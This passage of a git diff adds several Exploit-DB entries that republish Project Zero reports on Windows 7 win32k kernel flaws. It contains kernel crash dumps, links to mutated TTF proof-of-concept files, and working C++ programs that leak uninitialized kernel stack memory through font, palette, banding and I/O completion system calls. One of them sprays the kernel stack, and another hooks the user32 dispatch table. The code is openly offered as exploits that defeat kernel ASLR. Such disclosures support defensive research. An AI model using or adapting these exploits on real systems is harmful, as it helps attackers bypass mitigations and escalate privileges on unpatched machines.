UINT_PTR ApcContext,
UINT_PTR Status,
UINT_PTR IoStatusInformation
);
int main()
{
HANDLE io_completion;
NTSTATUS status = NtCreateIoCompletion(&io_completion, MAXIMUM_ALLOWED, nullptr, 0);
if (!NT_SUCCESS(status))
{
printf("Error creation IO Completion: %08X\n", status);
return 1;
}
while (true)
{
status = NtSetIoCompletion(io_completion, 0x12345678, 0x9ABCDEF0, 0x11111111, 0x22222222);
if (!NT_SUCCESS(status))
{
printf("Error setting IO Completion: %08X\n", status);
return 1;
}
IO_STATUS_BLOCK io_status = {};
memset(&io_status, 'X', sizeof(io_status));
UINT_PTR key_ctx;
UINT_PTR apc_ctx;
status = NtRemoveIoCompletion(io_completion, &key_ctx, &apc_ctx, &io_status, nullptr);
if (!NT_SUCCESS(status))
{
printf("Error setting IO Completion: %08X\n", status);
return 1;
}
UINT_PTR p = (UINT_PTR)io_status.Pointer;
if ((p >> 32) != 0)
{
printf("Leak: %p\n", io_status.Pointer);
}
}
return 0;
}

124
platforms/windows/dos/42744.txt Executable file
View file

@ -0,0 +1,124 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1273
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. The most frequent one occurring for the bug reported here is as follows:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8273777f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 919c279f, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!bGeneratePath+60
919c279f 8b0f mov ecx,dword ptr [edi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91a9b6af to 919c279f
STACK_TEXT:
99ee4a14 91a9b6af 00000000 000003e0 00000010 win32k!bGeneratePath+0x60
99ee4a40 91a9a105 fbc62cf0 00000005 faebeda0 win32k!ttfdQueryTrueTypeOutline+0x79
99ee4a90 91a82fef 00000000 fbc62cf0 00000005 win32k!ttfdSemQueryTrueTypeOutline+0x45
99ee4ad8 91a65175 00000000 fbc62cf0 00000005 win32k!PDEVOBJ::QueryTrueTypeOutline+0x3e
99ee4b90 91a5cd60 fbc62cf0 fbc62cf0 00000003 win32k!GreGetGlyphOutlineInternal+0x4f5
99ee4c0c 8286c87a 2801007e 0000003b 00000003 win32k!NtGdiGetGlyphOutline+0x95
99ee4c0c 770570b4 2801007e 0000003b 00000003 nt!KiFastCallEntry+0x12a
WARNING: Frame IP not in any known module. Following frames may be wrong.
002df760 00000000 00000000 00000000 00000000 0x770570b4
---
We have observed the invalid memory addresses accessed by the win32k!bGeneratePath function to be seemingly "wild", e.g. 0x8273777f, 0xe9849de5, 0xc7617bc7, 0xf2edc7eb etc. The above crash dump comes from an old version of Windows 7 32-bit, because symbols for win32k.sys on the latest build are currently unavailable on the Microsoft Symbol Server. Nevertheless, a crash summary from an up-to-date system is as follows:
--- cut ---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8128f57d, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 925375f6, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!PATHOBJ_bCloseFigure+76
925375f6 8b0f mov ecx,dword ptr [edi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 9261b9c8 to 925375f6
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
89277a10 9261b9c8 00000000 00000150 00000010 win32k!PATHOBJ_bCloseFigure+0x76
89277a3c 9261a316 fbb26cf0 0000000c fba36f38 win32k!XLATEOBJ_hGetColorTransform+0x423bf
89277a8c 926019b4 00000000 fbb26cf0 0000000c win32k!XLATEOBJ_hGetColorTransform+0x40d0d
89277ad4 925e33e5 00000000 fbb26cf0 0000000c win32k!XLATEOBJ_hGetColorTransform+0x283ab
89277b90 925dafcc fbb26cf0 fbb26cf0 00000003 win32k!XLATEOBJ_hGetColorTransform+0x9ddc
89277c0c 82837986 2201061c 00000029 00000003 win32k!XLATEOBJ_hGetColorTransform+0x19c3
89277c0c 772b6c74 2201061c 00000029 00000003 nt!KiSystemServicePostCall
0019f608 00000000 00000000 00000000 00000000 0x772b6c74
--- cut ---
While the above crashes are the most common ones, we have also encountered bugchecks (likely caused by the same issue) at the following other locations on old Windows 7 32-bit:
---
win32k!vQsplineToPolyBezier+43
91522614 8b4608 mov eax,dword ptr [esi+8]
---
win32k!vQsplineToPolyBezier+83
92292654 8941fc mov dword ptr [ecx-4],eax
---
... and on latest Windows 7 32-bit:
---
win32k!EngDeleteRgn+3293
91e0747c 8b460c mov eax,dword ptr [esi+0Ch]
---
The crash in win32k!vQsplineToPolyBezier+83 strongly suggests that the failures are caused or may lead to memory corruption, and consequently to arbitrary code execution.
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "fpgm" table. In case of the few samples we have examined, the problem seems to stem from changing one of the instructions in the FPGM program to "FLIPPT".
The issue reproduces on Windows 7 (other platforms unchecked). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the GetGlyphOutline() API with various parameters over all of the font's glyphs.
Attached is an archive with several proof-of-concept mutated TTF files.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42744.zip

113
platforms/windows/dos/42746.txt Executable file
View file

@ -0,0 +1,113 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1274
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1effff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a65a52, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!fsc_CalcGrayRow+87
91a65a52 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91a65990 to 91a65a52
STACK_TEXT:
981a885c 91a65990 ff1f83f8 ff1f8140 ff1f83a8 win32k!fsc_CalcGrayRow+0x87
981a88a0 919e26ac 00000008 ff1f8010 fbb36e78 win32k!fsc_CalcGrayMap+0x105
981a88e8 91b69e1a ff1f8010 ff1f807c 00000005 win32k!fs_ContourScan+0x582
981a89f4 91b69ef2 00000000 00000005 981a8b08 win32k!lGGOBitmap+0x15f
981a8a1c 919dd4f0 fbb36e78 00000005 981a8b08 win32k!ttfdGlyphBitmap+0x60
981a8a40 919dd386 fc23ccf0 00000009 00000005 win32k!ttfdQueryFontData+0x115
981a8a90 919dc5b2 00000000 fc23ccf0 00000009 win32k!ttfdSemQueryFontData+0x45
981a8ad8 91b351b4 00000000 fc23ccf0 00000009 win32k!PDEVOBJ::QueryFontData+0x3e
981a8b90 91b2cd60 fc23ccf0 fc23ccf0 00000006 win32k!GreGetGlyphOutlineInternal+0x534
981a8c0c 8288587a 04010215 00000022 00000006 win32k!NtGdiGetGlyphOutline+0x95
981a8c0c 76f370b4 04010215 00000022 00000006 nt!KiFastCallEntry+0x12a
WARNING: Frame IP not in any known module. Following frames may be wrong.
0020f504 00000000 00000000 00000000 00000000 0x76f370b4
---
The above crash dump comes from an old version of Windows 7 32-bit, because symbols for win32k.sys on the latest build are currently unavailable on the Microsoft Symbol Server. Nevertheless, a crash summary from an up-to-date system is as follows:
--- cut ---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1e3fff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91ce9382, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!EngDeleteClip+4883
91ce9382 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91ce92c0 to 91ce9382
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
9aa98858 91ce92c0 ff1ee3f8 ff1ee140 ff1ee3a8 win32k!EngDeleteClip+0x4883
9aa9889c 91c64346 00000008 ff1ee010 fb9dce78 win32k!EngDeleteClip+0x47c1
9aa988e4 91dfa025 ff1ee010 ff1ee07c 00000005 win32k!XFORMOBJ_iGetXform+0x5864
9aa989f0 91dfa0fd 00000000 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40a1c
9aa98a18 91c5f086 fb9dce78 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40af4
9aa98a3c 91c5ef1c fc22ccf0 00000009 00000005 win32k!XFORMOBJ_iGetXform+0x5a4
9aa98a8c 91c5e138 00000000 fc22ccf0 00000009 win32k!XFORMOBJ_iGetXform+0x43a
9aa98ad4 91dc3424 00000000 fc22ccf0 00000009 win32k!EngCTGetGammaTable+0xc967
9aa98b90 91dbafcc fc22ccf0 fc22ccf0 00000006 win32k!XLATEOBJ_hGetColorTransform+0x9e1b
9aa98c0c 82888986 0c0104d1 00000022 00000006 win32k!XLATEOBJ_hGetColorTransform+0x19c3
9aa98c0c 77986c74 0c0104d1 00000022 00000006 nt!KiSystemServicePostCall
001cf4ac 00000000 00000000 00000000 00000000 0x77986c74
--- cut ---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 (other platforms untested). It is easiest to reproduce with Special Pools enabled for win32k.sys. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the GetGlyphOutline() API with various parameters over all of the font's glyphs.
Attached is an archive with several proof-of-concept mutated TTF files.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42746.zip

87
platforms/windows/dos/42747.cpp Executable file
View file

@ -0,0 +1,87 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1275
We have discovered that the nt!NtGdiGetFontResourceInfoInternalW system call discloses portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for user-specified output buffer sizes up to 0x5c, a temporary stack-based buffer is used by the syscall for optimization. As opposed to the pool allocation, the stack memory area is not pre-initialized with zeros, and when it is copied back to user-mode in its entirety, its contents disclose leftover kernel stack bytes containing potentially sensitive information.
The vulnerability is fixed in Windows 10, which has the following memset() call at the beginning of the function:
--- cut ---
.text:0025F9E6 push 5Ch ; size_t
.text:0025F9E8 push ebx ; int
.text:0025F9E9 lea eax, [ebp+var_118]
.text:0025F9EF push eax ; void *
.text:0025F9F0 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 10. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 a9 fb c2 82 02 00 00 00 19 00 00 00 ................
00000010: 00 00 00 00 46 69 6c 65 a8 6f 06 89 46 69 6c 65 ....File.o..File
00000020: c8 00 00 00 ff 07 00 00 00 00 00 00 00 30 06 89 .............0..
00000030: 00 08 00 00 46 02 00 00 68 72 b8 93 d0 71 b8 93 ....F...hr...q..
00000040: a8 71 b8 93 00 8b 2e 9a 98 a8 a2 82 68 8b 2e 9a .q..........h...
00000050: fa a8 a2 82 a8 71 b8 93 46 69 6c e5 ?? ?? ?? ?? .....q..Fil.....
--- cut ---
Only the first four bytes of the data are properly initialized to 0x00, while the rest are visibly leaked from the kernel stack and contain a multitude of kernel-space addresses, readily facilitating exploitation of other memory corruption vulnerabilities.
The bug is limited to leaking at most ~0x5c bytes at a time, as specifying a larger size will provoke a correctly padded pool allocation instead of the stack-based buffer.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// Undocumented definitions for the gdi32!GetFontResourceInfoW function.
typedef BOOL(WINAPI *PGFRI)(LPCWSTR, LPDWORD, LPVOID, DWORD);
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Resolve the GDI32!GetFontResourceInfoW symbol.
HINSTANCE hGdi32 = LoadLibrary(L"gdi32.dll");
PGFRI GetFontResourceInfo = (PGFRI)GetProcAddress(hGdi32, "GetFontResourceInfoW");
// Trigger the vulnerability and dump kernel stack output. The code assumes that Windows is
// installed on partition C:\ and the C:\Windows\Fonts\arial.ttf font is present on disk.
BYTE OutputBuffer[0x5c] = { /* zero padding */ };
DWORD OutputSize = sizeof(OutputBuffer);
if (!GetFontResourceInfo(L"C:\\Windows\\Fonts\\arial.ttf", &OutputSize, OutputBuffer, 5)) {
printf("GetFontResourceInfo failed.\n");
return 1;
}
PrintHex(OutputBuffer, sizeof(OutputBuffer));
return 0;
}

204
platforms/windows/dos/42748.cpp Executable file
View file

@ -0,0 +1,204 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1276&desc=2
We have discovered that the nt!NtGdiEngCreatePalette system call discloses large portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for palettes created in the PAL_INDEXED mode with up to 256 colors, a temporary stack-based buffer is used by the syscall for optimization (instead of locking the entire ring-3 memory area with win32k!bSecureBits). The stack memory region is not pre-initialized with zeros, but its contents may still be treated as valid palette colors by win32k!EngCreatePalette, in the special corner case when:
a) 1 <= cColors <= 256
b) pulColors == NULL
The above setting causes the the win32k!bSafeReadBits to automatically succeed without actually reading any data from user-space, which further leads to the creation of a palette with colors set to uninitialized memory from the kernel stack (up to 1024 bytes!). These bytes can be subsequently read back using the GetPaletteEntries() API.
The vulnerability is fixed in Windows 8 and 10, which have the following memset() calls at the beginning of the function:
(Windows 8.1)
--- cut ---
.text:001B4B62 push 3FCh ; size_t
.text:001B4B67 lea eax, [ebp+var_400]
.text:001B4B6D mov [ebp+var_404], edi
.text:001B4B73 push edi ; int
.text:001B4B74 push eax ; void *
.text:001B4B75 call _memset
--- cut ---
(Windows 10)
--- cut ---
.text:002640C8 push 400h ; size_t
.text:002640CD mov [ebp+var_410], eax
.text:002640D3 lea eax, [ebp+var_404]
.text:002640D9 push edi ; int
.text:002640DA push eax ; void *
.text:002640DB mov [ebp+var_41C], ebx
.text:002640E1 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 8. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000230: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000260: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000270: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000280: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000290: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000300: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000310: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000320: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000330: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000340: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000350: 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00 AAAAAAAAAAAA....
00000360: 21 00 00 00 00 00 00 00 88 0d cf 8e da 3f 87 82 !............?..
00000370: 09 50 14 00 04 00 00 00 00 dc 9d 98 25 82 5e 4d .P..........%.^M
00000380: 00 00 00 00 f0 dd 9d 98 d0 09 96 82 12 01 00 00 ................
00000390: 48 0d cf 8e 00 00 00 00 ae 01 00 00 6f 00 00 00 H...........o...
000003a0: 00 00 00 00 7e 53 0c 00 1c fc 1c 9a a5 f0 87 82 ....~S..........
000003b0: ef ff 07 00 12 01 00 00 40 58 14 00 cc f2 41 00 ........@X....A.
000003c0: 01 00 00 00 01 00 00 00 f0 dd 9d 98 00 00 00 00 ................
000003d0: 12 01 00 00 00 00 00 00 14 05 00 c0 25 82 5e 4d ............%.^M
000003e0: 00 00 00 00 00 00 00 00 00 10 00 00 6c fb 1c 9a ............l...
000003f0: 2c f9 1c 9a 67 08 00 00 67 08 00 00 48 0d cf 8e ,...g...g...H...
--- cut ---
The planted 0x41 bytes are clearly visible in the above hex dump. Since the stack spraying primitive used here (nt!NtMapUserPhysicalPages) still leaves some bytes intact at higher addresses, these bytes (containing a number of kernel-space addresses etc.) can be observed at offsets 0x360-0x400.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winddi.h>
#include <cstdio>
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
PBYTE _ptr = (PBYTE)ptr;
for (ULONG i = 0; i < size; i++) {
_ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
// Initialize the thread as GUI.
LoadLibrary(L"user32.dll");
// Fill the kernel stack with some marker 'A' bytes.
SprayKernelStack();
// Create a Palette object with 256 4-byte uninitialized colors from the kernel stack.
HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);
if (hpal == NULL) {
printf("[-] NtGdiEngCreatePalette failed.\n");
return 1;
}
// Retrieve the uninitialized bytes back to user-mode.
PALETTEENTRY palentries[256] = { /* zero padding */ };
if (GetPaletteEntries(hpal, 0, 256, palentries) != 256) {
printf("[-] GetPaletteEntries failed.\n");
return 1;
}
// Dump the data on screen.
PrintHex((PBYTE)palentries, sizeof(palentries));
return 0;
}

154
platforms/windows/dos/42749.cpp Executable file
View file

@ -0,0 +1,154 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1304
We have discovered that the win32k!NtGdiDoBanding system call discloses portions of uninitialized kernel stack memory to user-mode clients.
More specifically, exactly 8 bytes of uninitialized kernel stack memory are copied to ring-3 in one of two execution contexts (unique stack traces):
--- 1 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvStartBanding+000000b1
#3 win32k.sys!GreDoBanding+000000ad
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 1 ---
... and ...
--- 2 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvNextBand+000000b1
#3 win32k.sys!GreDoBanding+0000011e
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 2 ---
The names and offsets are specific to Windows 7 32-bit from February 2017, as symbols for the latest win32k.sys are not available from the Microsoft Symbol Server at the moment. The leaked bytes origin from the stack frame of the win32k!NtGdiDoBanding function (top-level syscall handler), and a pointer to the uninitialized buffer is passed down to win32k!GreDoBanding in the third argument.
The attached proof-of-concept program can be used to reproduce the vulnerability on Windows 7 32-bit. On our test virtual machine, the output is as follows:
--- cut ---
[+] Leaked data: 00000bf8 00460000
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
...
--- cut ---
As it turns out, 0xff9ed130 is a valid paged session pool address, and 0x969e68ad is a valid code address within win32k.sys:
--- cut ---
3: kd> !pool ff9ed130
Pool page ff9ed130 region is Paged session pool
ff9ed000 size: 118 previous size: 0 (Allocated) Usqu
*ff9ed118 size: ee8 previous size: 118 (Allocated) *GDev
Pooltag GDev : Gdi pdev
3: kd> u 969e68ad
win32k!EngReleaseSemaphore+0x2f6:
969e68ad c3 ret
969e68ae 90 nop
969e68af 90 nop
969e68b0 90 nop
969e68b1 90 nop
969e68b2 90 nop
969e68b3 8bff mov edi,edi
969e68b5 55 push ebp
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
namespace globals {
LPVOID(WINAPI *OrigClientPrinterThunk)(LPVOID);
} // namespace globals
PVOID *GetUser32DispatchTable() {
__asm {
mov eax, fs:30h
mov eax, [eax + 0x2c]
}
}
BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
PVOID *DispatchTable = GetUser32DispatchTable();
DWORD OldProtect;
if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
printf("VirtualProtect#1 failed, %d\n", GetLastError());
return FALSE;
}
*lpOrigHandler = DispatchTable[Index];
DispatchTable[Index] = lpNewHandler;
if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
printf("VirtualProtect#2 failed, %d\n", GetLastError());
return FALSE;
}
return TRUE;
}
LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) {
LPDWORD DwordData = (LPDWORD)Data;
if (DwordData[0] == 0x1c && (DwordData[1] == 0x39 || DwordData[1] == 0x3a)) {
LPDWORD LeakedData = (LPDWORD)DwordData[6];
